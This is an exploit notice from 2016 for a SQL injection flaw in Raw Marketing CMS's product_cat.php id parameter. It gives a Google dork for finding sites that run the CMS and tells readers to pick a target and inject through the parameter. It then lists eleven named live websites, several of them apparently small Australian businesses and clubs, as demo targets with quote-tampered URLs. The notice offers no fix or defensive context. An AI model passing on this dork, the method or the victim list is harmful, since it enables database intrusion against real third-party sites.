######################
# Exploit Title : Raw Marketing CMS SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://raw-marketing.com.au/
# Google Dork : intext:" Website by Raw Marketing"
# Date: 23 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
##########M###########
# Vulnerable File : product_cat.php
# Request Method: GET
# Describe : Search dork and select Target. Put /product_cat.php?id=1 After url such as :
# http://site.com/product_cat.php?id=14
# You See Error And You Can Inject ... Ok
#
# Demo :
# http://bubsonboard.com.au/product_cat.php?id=1'
# http://www.kathmanducuisine.com.au/product_cat.php?id=1'
# http://atvlifeguards.com/product_cat.php?id=1'
# http://matthewdamesmusic.com/product_cat.php?id=1'
# http://www.riverwalktasmania.com.au/product_cat.php?id=1'
# http://sparksbuilders.com.au/product_cat.php?id=1'
# http://ntfua.com.au/product_cat.php?id=1'
# http://www.museumofrarefindings.com/product_cat.php?id=1'
# http://www.rotaryclubofsullivanscove.org.au/product_cat.php?id=1'
# http://www.gowrie-tas.com.au/product_cat.php?id=1'
# http://tasbeauty.com.au/product_cat.php?id=1'
#
#
######################
# discovered by : Net Hacker
######################